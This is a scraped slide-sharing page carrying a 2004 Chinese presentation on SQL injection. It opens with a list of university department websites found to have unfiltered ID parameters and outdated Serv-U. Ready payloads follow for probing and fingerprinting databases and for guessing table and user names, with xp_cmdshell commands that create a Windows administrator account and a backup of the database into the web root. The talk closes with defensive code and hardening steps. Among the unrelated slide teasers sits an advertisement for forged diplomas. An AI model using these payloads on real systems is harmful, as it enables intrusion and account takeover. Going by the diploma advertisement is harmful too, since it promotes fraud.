SQL 注入漏洞全接触 周平21842542004-5-11. 网站评比中发现的问题 经济学院 serv-u 版本太低, 对于新闻的 ID 传入没有进行过滤, 网上办公系统也有 很大漏洞 经济学院 serv-u 版本太低, 对于新闻的 ID 传入没有进行过滤, 网上办公系统也有 很大漏洞 外文学院.

Slides:



Advertisements
Similar presentations
ProQuest Digital Dissertations PQDD 学位论文全文库. 1 、数据库简介 PQDD 是世界著名的学位论文数据库,收 录有欧美 1 , 000 余所大学文、理、工、农、医 等领域的博士、硕士学位论文,是学术研究中 十分重要的信息资源。 本数据库为 PQDD 文摘 数据库中部分记录的全文。
Advertisements

一、统计范围 注册地在湖里区的具有房地产开发资质的 房地产开发企业 无论目前是否有开发项目 无论开发的项目是在湖里区还是在其他区 没有开发项目的企业需要报送年报和月报 中的资金表(空表)。 新成立的项目公司,要先入库,再报报表。
数控机床结构及维修 主编:于万成 王桂莲 副主编:李昊 人民邮电出版社 北京 ◎ 了解数控系统的组成和常见数控系统 的特点 ◎ 熟悉常见数控系统的参数设置 ◎ 掌握数控系统的常见故障诊断及维修 方法 调试与维修数控 机床的数控系统.
第四章 犯罪概念与犯罪构成. 第一节 犯罪概念 一、犯罪概念的类型  (一)犯罪的形式概念  (二)犯罪的实质概念  (三)犯罪的混合概念.
DCN 多核防火墙快速配置之 目的 NAT 配置 神州数码网络 蒋忠平.
石化的 IT 大挑战 洛阳石化工程公司. 石化公司简介 中国石化集团洛阳石油化工工程公司,是国内能源化 工领域集技术专利商与工程承包商于一体的高科技企 业。拥有中国综合设计甲级资质,为国家首批业务涵 盖 21 个行业的工程咨询企业之一,拥有工程总承包、 工程设计、工程监理、工程咨询和环境影响评价等甲.
HistCite 结果分析示例 罗昭锋. By:SC 可能原因:文献年度过窄,少有相互引用.
LOGO 文献管理软件 NoteExpress 简介 《文献管理与信息分析》课程系列之九中国科学技术大学.
本幻灯为医用耗材集中询价采购网上操作说明,请参考收费说明、供应厂商流程等文件 综合学习。幻灯次序按操作次序进行,可配合自身用户名对照学习。 操作人员:所有类别 操作说明:所有标 new 标志的文件,务必仔细查看。原有用户名和信息均可继续使用,新 使用人员可点击注册申请使用.
John Wilkinson - LexisNexis Confidential 1 法律库 Lexis.com 法律数据库介绍.
LexisNexis Academic Universe 学术大全数据库 使用介绍. 2 讲解内容 : 了解 LexisNexis Academic 学术大全数据库 具体的使用说明 相关问题的说明 互动空间 联系我们.
嵌入式操作系统 陈香兰 Fall 系统调用 10/27/09 嵌入式 OS 3/12 系统调用的意义  操作系统为用户态进程与硬件设备进行交互提供 了一组接口 —— 系统调用  把用户从底层的硬件编程中解放出来  极大的提高了系统的安全性  使用户程序具有可移植性.
Thomson Reuters 中国办事处 2008 年 5 月 Web of Science 培训课件 第六部分 : Web of Science 的管理功能.
吉林大学远程教育课件 主讲人 : 杨凤杰学 时: 64 ( 第六十二讲 ) 离散数学. 最后,我们构造能识别 A 的 Kleene 闭包 A* 的自动机 M A* =(S A* , I , f A* , s A* , F A* ) , 令 S A* 包括所有的 S A 的状态以及一个 附加的状态 s.
1 为了更好的揭示随机现象的规律性并 利用数学工具描述其规律, 有必要引入随 机变量来描述随机试验的不同结果 例 电话总机某段时间内接到的电话次数, 可用一个变量 X 来描述 例 检测一件产品可能出现的两个结果, 也可以用一个变量来描述 第五章 随机变量及其分布函数.
Company Logo 辨别非法期刊的特征 ( 5 )地区号与所在地区不吻合,即异地办刊,或者说 编辑部地址与 CN 后面的地区号不相一致。 如,非法出版物《中国教育论坛》的 CN 号为 43 ,应 是在湖南出版的,若改在山东出版,应重新分配 CN 号, 或者说, CN 号的前两位应改为山东的地区号.
Apabi 电子图书. 数据库介绍 方正 Apabi 电子图书由北大方正电子有限公司 最新推出的, 北大方正电子有限公司占据全球中 文电子出版系统 90 %以上市场份额的. 方正 Apabi 电子图书收录了全国 400 多家出版社 2 万余种最新中文电子图书,涵盖了社会学、 哲学、宗教、历史、经济管理、文学、数学、
《文献管理与信息分析》 罗昭锋 中国扩科学技术大学 HistCite 作业及课程报告要求.
91job 就业网络联盟管理说明. 网址: 就业网络联盟 /login.aspx 后台管理
线性代数习题课 吉林大学 术洪亮 第一讲 行 列 式 前面我们已经学习了关 于行列式的概念和一些基本 理论,其主要内容可概括为:
第 4 章 过程与变量的作用范围. 4.1 Visual Basic 的代码模块 Visual Basic 的应用程序是由过程组成的, 过程代码存放在模块中。 Visual Basic 提供了 三类模块,它们是窗体模块、标准模块和类 模块。 窗体模块 窗体模块是大多数 Visual Basic.
数 学 系 University of Science and Technology of China DEPARTMENT OF MATHEMATICS 第 3 章 曲线拟合的最小二乘法 给出一组离散点,确定一个函数逼近原函数,插值是这样的一种手段。 在实际中,数据不可避免的会有误差,插值函数会将这些误差也包括在内。
聚合物在生物高分子分离中的应用 王延梅 中国科学技术大学高分子科学与工程系 Tel
重庆维普:中国科技期刊数据库 主要内容 中国科技期刊数据库(全文版) 外文科技期刊数据库(文摘版) 中国科技经济新闻数据库(文摘版) 讲解:信息咨询部.
外文文献检索示例. 实验目的: 掌握利用计算机网络检索外文文献的基本方法; 了解熟悉下列数据库的结构、内容并掌握其检索方 法 ; 掌握检索的主要途径:出版物( Publication )、关键 词( Keyword )、作者( Author )等。
信息利用与学术论文写作 Library of Jiangsu University, Zhenjiang Sha Zhenjiang
湖南省赛宝软件服务有限公司 信息报送及申报系统演示 湖南省赛宝软件服务有限公司 李纠.
吉林大学远程教育课件 主讲人 : 杨凤杰学 时: 64 ( 第五十三讲 ) 离散数学. 定义 设 G= ( V , T , S , P ) 是一个语法结构,由 G 产生的语言 (或者说 G 的语言)是由初始状态 S 演绎出来的所有终止符的集合, 记为 L ( G ) ={w  T *
编译原理总结. 基本概念  编译器 、解释器  编译过程 、各过程的功能  编译器在程序执行过程中的作用  编译器的实现途径.
1.2 地理信息技术在区域 地理环境研究中的应用. 地理信息技术: 指获取、管理、分析和 应用地理空间信息的现 代技术的总称。 应用:资源调查、环境监测、自然灾害防御监测、国 土资源管理、国土开规划等。 地理信息 : 遥感 (RS) 、全球定位系统 (GPS) 和地理信息系统 (GIS)
周期信号的傅里叶变换. 典型非周期信号 ( 如指数信号, 矩形信号等 ) 都是满足绝对可 积(或绝对可和)条件的能量信号,其傅里叶变换都存在, 但绝对可积(或绝对可和)条件仅是充分条件, 而不是必 要条件。引入了广义函数的概念,在允许傅里叶变换采用 冲激函数的前提下, 使许多并不满足绝对可积条件的功率.
Department of Mathematics 第二章 解析函数 第一节 解析函数的概念 与 C-R 条件 第二节 初等解析函数 第三节 初等多值函数.
系统介绍 一 二 系统登录 三 使用流程 四 信息维护 系统介绍 根据中国政府与有关国家政府签署的相互出具《最终用户和最终 用途说明》的协议,为了便利企业申办《最终用户和最终用途说 明》, 商务部机电和科技产业司委托中国国际电子商务中心开发了 《最终用户和最终用途说明》申请系统,企业可通过此系统填写.
晒课系统功能介绍 抚顺市教师进修学院电教部. 一、系统整体功能介绍 二、教师如何晒课 三、教研员如何协助 四、管理员的权限 五、时间安排及注意问题.
基因工程技术向 “ 肥胖 ” 宣战 瘦蛋白( Leptin) 基因 克隆与表达 瘦蛋白的基因工程.
《 UML 分析与设计》 交互概述图 授课人:唐一韬. 知 识 图 谱知 识 图 谱知 识 图 谱知 识 图 谱.
适用场景 应用背景 1 、企业使用电商平台作为前 台销售门户, NC 作为后台管 理软件; 2 、后台从商城平台自动定时 下载,快速导入到 NC 形成销 售订单,并按 ERP 业务规则 进行校验及触发后续流程; 3 、提高订单传递的及时性、 准确性、规范性,减少工作量, 降低出错率;
华南师范大学教育科学学院 第二步:明确小组成员分工 选举 “ 常任组长 ” 1 名。 所有组员以个人姓名笔画排序 1 、 2 、 3 、 4 、 5 号,轮流担任 “ 轮值组长 ” ,每一周进行轮换。 本次课的轮值组长为 1 号。
1 、如果 x + 5 > 4 ,那么两边都 可得 x >- 1 2 、在- 3y >- 4 的两边都乘以 7 可得 3 、在不等式 — x≤5 的两边都乘以- 1 可得 4 、将- 7x — 6 < 8 移项可得 。 5 、将 5 + a >- 2 a 移项可得 。 6 、将- 8x < 0.
新一代移动物联系统 MC MOBILE CONTROL 开启办公物联网时代 Product Promotion.
项目七: PLC 功能指令应用 带进位循环左移指令 XXXXX. 项目七: PLC 功能指令应用 FX2 系列可编程控制器移位控制指令有移位、循环移位、字移位 及先进先出 FIFO 指令等 10 条指令。 带进位循环右移指令 RCR 带进位循环左移指令 RCL 字右移位指令 WSFR 先入先出读出指令.
1 物体转动惯量的测量 南昌大学理学院
Java 水晶报表. 目录 水晶报表开发 (CrystalReports 2008) Java 水晶报表 (JBuilder 2005) 报表项目布署 (WebSphere v6.1)
超星数字图书馆 一、页面的使用 进入数字图书馆网页 下载超星阅读器 查找图书.
企业产品标准信息公共服务平台 操作介绍 目录 一 、系统架构介绍 二 、企业产品标准自我声明填报系统 三 、企业产品标准公示系统.
表单自定义 “ 表单自定义 ” 功能是用于制作表单的 工具,用数飞 OA 提供的表单自定义 功能能够快速制作出内容丰富、格 式规范、美观的表单。
检索 聪明的检索 简单自然  一框式检索,无须学习  逐步细化,贴近人的思维,容 易理解 善于甄别  挑选最相关、最权威、最新的 文献 总结联想  论文在检索结果中的学科、期 刊、时间等分布情况  启发思考 有礼貌  快速响应.
力的合成 力的合成 一、力的合成 二、力的平行四边形 上一页下一页 目 录 退 出. 一、力的合成 O. O. 1. 合力与分力 我们常常用 一个力来代替几个力。如果这个 力单独作用在物体上的效果与原 来几个力共同作用在物体上的效 果完全一样,那么,这一个力就 叫做那几个力的合力,而那几个 力就是这个力的分力。
2012 年昆明冶金高等专科学校 生源地贷款培训会. 一、生源地贷款鉴定证明 各地区县级教育部门生源地贷款办理时间一般 从 7 月 1 日开始。学校应尽快办理好学校鉴定证明, 给学生充裕的时间到当地办理.
“ 图书馆资源与服务利用 ” 专题讲座 第 9 讲 JSTOR 数据库与 Kluwer Online 数据库的使用.
荆门市总工会会员信息采集系统 操作培训 融建信息技术有限公司 肖移海 QQ群号:
逻辑设计基础 1 第 7 章 多级与(或)非门电路 逻辑设计基础 多级门电路.
“ 百链 ” 云图书馆. 什么是百链云图书馆?1 百链云图书馆的实际效果?2 百链云图书馆的实现原理?3 百链云图书馆的价值?44 图书馆要做什么?55 提 纲.
消防产品网上认证业务系统 操作指南(初始认证委托) 公安部消防产品合格评定中心 2015 年 4 月.
如何申请《教育部学历证书电子注册备案表》 以及《教育部学历认证报告》. 一、如何申请《教育部学历证书电 子注册备案表》中文版 方式一:实名注册过的用户,通过学信档案 申请。 实名注册学信档案实名注册学信档案.
参考文献管理软件. 常见参考文献管理软件 : 中文 : CNKI E-learning (目前免费) NoteExpress NoteFirst 英文: Refworks Endnote (网络版免费) Mendeley……
开放教育学员入学须知 第一部分:浏览山东理工大学远程与继续 教育学院网站浏览山东理工大学远程与继续 教育学院网站 第二部分:浏览中央电大教学平台浏览中央电大教学平台 第三部分:浏览山东电大教学平台浏览山东电大教学平台 第四部分:浏览淄博电大教学平台浏览淄博电大教学平台 第五部分:淄博电大教学平台使用淄博电大教学平台使用.
中国科学引文数据库. 1 、数据库简介 目前,亚太地区的科学研究产出所占份额超过了全球论文产量的四分 之一。尤其是中国在论文数量方面表现出了强劲的增长势头,自 1981 年来, 中国论文的平均增长率为 17% 。为了更好的展示中国的学术研究成果,汤 森路透科技与医疗集团于 2007 年与中国科学院开展战略合作项目,即将中.
一、 版 面 构 成 的 概 念 版 面 构 成 的 概 念 二、 版 面 构 成 的 发 展 趋 势 版 面 构 成 的 发 展 趋 势 三、 广 告 文 字 的 版 面 构 成 广 告 文 字 的 版 面 构 成 四、 广 告 版 面 的 视 觉 流 程 广 告 版 面 的 视 觉 流 程.
如何开展新学期 “ 导学课 ”. 如何组织 导学课 遇到问题 联系谁 导学课 基本内容 123 目录.
专利信息检索概论专利信息检索概论 国家知识产权局专利局文献部师朝阳 国家知识产权局专利局文献部师朝阳
张勤 人大报刊复印资料 专题全文数据库 简 介简 介 《人大报刊资料全文数据库》是中国人民大 学书报资料中心与北京博利群电子信息有限 公司联合开发研制的大型数据库光盘。它涵 盖面广、信息量大、分类科学、筛选严谨、 结构合理,是国内最具权威的社会科学、人.
人 有 悲 欢 离 合, 月有阴晴圆缺。月有阴晴圆缺。 华师大版七年级数学第二册 海口市第十中学 数学组 吴锐.
§5.6 利用希尔伯特 (Hilbert) 变换 研究系统的约束特性 希尔伯特变换的引入 可实现系统的网络函数与希尔伯特变换.
1 第三章 数列 数列的概念 考点 搜索 ●数列的概念 ●数列通项公式的求解方法 ●用函数的观点理解数列 高考 猜想 以递推数列、新情境下的 数列为载体, 重点考查数列的通 项及性质, 是近年来高考的热点, 也是考题难点之所在.
参展主要内容 以信息科技支撑现代农业为主题,包括精准农业、数字农业、农 业物联网、农业遥感、信息服务 5 部分内容,重点展示科研院所、大 专院校等单位的科研成果及应用示例。精准农业重点展示面向设施、 果园、大田生产管理过程中的关键技术及智能装备,以精准施肥、施 药、灌溉大型机具实物展示为主,同时将搭建微型温室(约.
韩文数据库使用说明 鲁锦松. 主要内容 一、为什么要用数据库 二、怎样利用中文数据库 三、怎样利用韩文数据库.
SCI 数据库检索练习参考 本练习完全依照 SCI 数据库实际检索过程而 实现。 本练习完全依照 SCI 数据库实际检索过程而 实现。 练习中,选择了可以举一反三的题目,读 者可以根据题目进行另外的检索练习,如: 可将 “ 与 ” 运算检索改为 “ 或 ” 、 “ 非 ” 运算检索 等等。 练习中,选择了可以举一反三的题目,读.
QQ/ 微信: 真实教育部认证永久存档, 100% 可查,可随我司工作人员一同前往教育部窗 口递交材料 + 全套文凭【诚招当地代理,有业余时 间的欢迎大家免费咨询,欢迎在校生 】 如果您,或者是您的同学朋友是以下情况,我们都能竭诚为您解决实际问题: 1 、在校期间,因各种原因未能顺利毕业,拿不到官方毕业证;
1 安全体系结构 曹天杰 中国矿业大学计算机科学与技术学院. 2 安全体系结构 安全体系结构的内容包括:提供安全服务与 有关安全机制在本系统下的一般描述,这些 服务和机制必须为本系统所配备;确定本系 统内部可以提供这些服务的位置。 一个信息系统安全体系结构的形成主要是根.
Presentation transcript:

SQL 注入漏洞全接触 周平

网站评比中发现的问题 经济学院 serv-u 版本太低, 对于新闻的 ID 传入没有进行过滤, 网上办公系统也有 很大漏洞 经济学院 serv-u 版本太低, 对于新闻的 ID 传入没有进行过滤, 网上办公系统也有 很大漏洞 外文学院 ID 传入没有进行过滤 外文学院 ID 传入没有进行过滤 软件学院站内搜索没有对 ' 进行过滤 软件学院站内搜索没有对 ' 进行过滤 台湾研究院 ID 传入没有进行过滤, 开放 SMTP,NNTP 等不必要服务 台湾研究院 ID 传入没有进行过滤, 开放 SMTP,NNTP 等不必要服务 管理学院 serv-u 版本太低, SMTP 匿名发送, ID 传入没有进行过滤 管理学院 serv-u 版本太低, SMTP 匿名发送, ID 传入没有进行过滤 厦大医院 ID 传入没有进行过滤 厦大医院 ID 传入没有进行过滤 党委宣传部 ID 传入没有进行过滤 党委宣传部 ID 传入没有进行过滤 化学化工学院 ID 传入没有进行过滤 化学化工学院 ID 传入没有进行过滤 校工会 ID 传入没有进行过滤 校工会 ID 传入没有进行过滤 党委组织部 ID 传入没有进行过滤 党委组织部 ID 传入没有进行过滤 职业技术学院 ID 传入没有进行过滤 职业技术学院 ID 传入没有进行过滤 图书馆 ID 传入没有进行过滤 图书馆 ID 传入没有进行过滤 国际处 ID 传入没有进行过滤 国际处 ID 传入没有进行过滤 人事处 ID 传入没有进行过滤 人事处 ID 传入没有进行过滤 法学院 ID 传入没有进行过滤,serv-u 版本太低 法学院 ID 传入没有进行过滤,serv-u 版本太低 资产与后勤事务管理处 ID 传入没有进行过滤 资产与后勤事务管理处 ID 传入没有进行过滤

SQL注入原理 ‘ ‘ Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表 达式 'id = 772'' 中。 /displaynews.asp ,行 31 说明 : 数据库为 Access 数据库为 Access 程序没有对于 id 进行过滤 程序没有对于 id 进行过滤 数据库表中有个字段名为 id 数据库表中有个字段名为 id

判断能否进行SQL注入 1. and 1= and 1=2 如果 1 显示正常, 2 显示错误, 或者没有页面, 则表明可以进行 2 显示错误, 或者没有页面, 则表明可以进行 SQL 注入

判断数据库类型 2 and user>0 2 and user>0 2 and user>0 2 and user>0 user 是 SQL Server 的内置变量 1.and (select count(*) from sysobjects)>0 2.and (select count(*) from msysobjects)>0 如果 1 正常, 则表示 Sql server. 如果 1 正常, 则表示 Sql server.

注入方法 (A) ID=49 这类注入的参数是数字型, SQL 语句原貌大致如下: Select * from 表名 where 字段 =49 注入的参数为 ID=49 And [ 查询条件 ] ,即是生成语句: Select * from 表名 where 字段 =49 And [ 查询条件 ] (B) Class= 连续剧 这类注入的参数是字符型, SQL 语句原貌大致概如下: Select * from 表名 where 字段 = ’ 连续剧 ’ 注入的参数为 Class= 连续剧 ’ and [ 查询条件 ] and ‘’ = ’ ,即是生成语句: Select * from 表名 where 字段 = ’ 连续剧 ’ and [ 查询条件 ] and ‘’ = ’’ (C) 搜索时没过滤参数的,如 keyword= 关键字, SQL 语句原貌大致如下: Select * from 表名 where 字段 like ’ % 关键字 % ’ 注入的参数为 keyword= ’ and [ 查询条件 ] and ‘ %25 ’ = ’ , 即是生成语句: Select * from 表名 where 字段 like ’ % ’ and [ 查询条件 ] and ‘ % ’ = ’ % ’ (A) ID=49 这类注入的参数是数字型, SQL 语句原貌大致如下: Select * from 表名 where 字段 =49 注入的参数为 ID=49 And [ 查询条件 ] ,即是生成语句: Select * from 表名 where 字段 =49 And [ 查询条件 ] (B) Class= 连续剧 这类注入的参数是字符型, SQL 语句原貌大致概如下: Select * from 表名 where 字段 = ’ 连续剧 ’ 注入的参数为 Class= 连续剧 ’ and [ 查询条件 ] and ‘’ = ’ ,即是生成语句: Select * from 表名 where 字段 = ’ 连续剧 ’ and [ 查询条件 ] and ‘’ = ’’ (C) 搜索时没过滤参数的,如 keyword= 关键字, SQL 语句原貌大致如下: Select * from 表名 where 字段 like ’ % 关键字 % ’ 注入的参数为 keyword= ’ and [ 查询条件 ] and ‘ %25 ’ = ’ , 即是生成语句: Select * from 表名 where 字段 like ’ % ’ and [ 查询条件 ] and ‘ % ’ = ’ % ’

猜表名 ID=49 And (Select Count(*) from Admin)>=0 ID=49 And (Select Count(*) from Admin)>=0 表名猜出来后,将 Count(*) 替换成 Count( 字段名 ) , 表名猜出来后,将 Count(*) 替换成 Count( 字段名 ) , and (select top 1 len(username) from Admin)>0 猜用户名长度 and (select top 1 len(username) from Admin)>0 猜用户名长度 and (select top 1 asc(mid(username,1,1)) from Admin)>0 猜用户名 and (select top 1 asc(mid(username,1,1)) from Admin)>0 猜用户名

利用系统表注入 SQLServer 数据库 id=1;exec master..xp_cmdshell “ net user name password /add ”– id=1;exec master..xp_cmdshell “ net user name password /add ”– 创建系统用户 创建系统用户 Id=1;exec master..xp_cmdshell “ net localgroup name administrators /add ” -- 把该用户加入 administrators 组 Id=1;exec master..xp_cmdshell “ net localgroup name administrators /add ” -- 把该用户加入 administrators 组 id=1;backup database 数据库名 to disk= ’ c:\inetpub\wwwroot\1.db ’ ;-- 备份数据库 ….. id=1;backup database 数据库名 to disk= ’ c:\inetpub\wwwroot\1.db ’ ;-- 备份数据库 …..

绕过程序限制继续注入 where xtype= ’ U ’ where xtype= ’ U ’ where xtype=char(85) where xtype=char(85)

防范方法 Function SafeRequest(ParaName,ParaType) '--- 传入参数 --- 'ParaName: 参数名称 - 字符型 'ParaType: 参数类型 - 数字型 (1 表示以上参数是数字, 0 表示以上参数为字符 ) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If not isNumeric(ParaValue) then Response.write " 参数 " & ParaName & " 必须为数字型! " Response.end End if Else ParaValue=replace(ParaValue,"'","''") End if SafeRequest=ParaValue End function Function SafeRequest(ParaName,ParaType) '--- 传入参数 --- 'ParaName: 参数名称 - 字符型 'ParaType: 参数类型 - 数字型 (1 表示以上参数是数字, 0 表示以上参数为字符 ) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If not isNumeric(ParaValue) then Response.write " 参数 " & ParaName & " 必须为数字型! " Response.end End if Else ParaValue=replace(ParaValue,"'","''") End if SafeRequest=ParaValue End function

加强 SQL Server 安全 IP 安全策略里面, 将 TCP 1433, UDP1434 端 口拒绝所有 IP.. IP 安全策略里面, 将 TCP 1433, UDP1434 端 口拒绝所有 IP.. 打 SP3 补丁 打 SP3 补丁 去除一些非常危险的存储过程 use master 去除一些非常危险的存储过程 use master go go sp_dropextendedproc 'xp_cmdshell' sp_dropextendedproc 'xp_cmdshell'

谢谢大家 欢迎交流 欢迎交流